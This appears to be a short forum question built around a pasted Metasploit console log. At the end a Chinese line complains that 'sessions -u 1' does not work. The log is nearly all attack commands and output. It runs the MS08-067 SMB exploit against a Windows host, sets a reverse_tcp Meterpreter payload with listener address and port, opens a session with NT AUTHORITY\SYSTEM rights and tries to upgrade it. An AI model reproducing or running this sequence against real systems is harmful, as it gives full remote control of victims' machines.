msf > use exploit/windows/smb/ms08_067_netapimsf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcpPAYLOAD => windows/meterpreter/reverse_tcpmsf exploit(ms08_067_netapi) > set TARGET 41TARGET => 41msf exploit(ms08_067_netapi) > setg LHOST 192.168.1.11LHOST => 192.168.1.11msf exploit(ms08_067_netapi) > setg LPORT 8080LPORT => 8080msf exploit(ms08_067_netapi) > setg RHOST 192.168.1.142RHOST => 192.168.1.142msf exploit(ms08_067_netapi) > exploit -z[*] Started reverse handler on 192.168.1.11:8080 [*] Attempting to trigger the vulnerability...[*] Sending stage (752128 bytes) to 192.168.1.142[*] Meterpreter session 1 opened (192.168.1.11:8080 -> 192.168.1.142:1074) at 2013-04-28 10:44:36 -0400[*] Session 1 created in the background.msf exploit(ms08_067_netapi) > sessions -lActive sessions=============== Id Type Information Connection -- ---- ----------- ---------- 1 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ ROOT-9743DD32E3 192.168.1.11:8080 -> 192.168.1.142:1074 (192.168.1.142)msf exploit(ms08_067_netapi) > sessions -u 1[-] Session 1 is not a command shell session.msf exploit(ms08_067_netapi) > sessions -i 1[*] Starting interaction with 1...meterpreter >
sessions -u 1不起作用啊。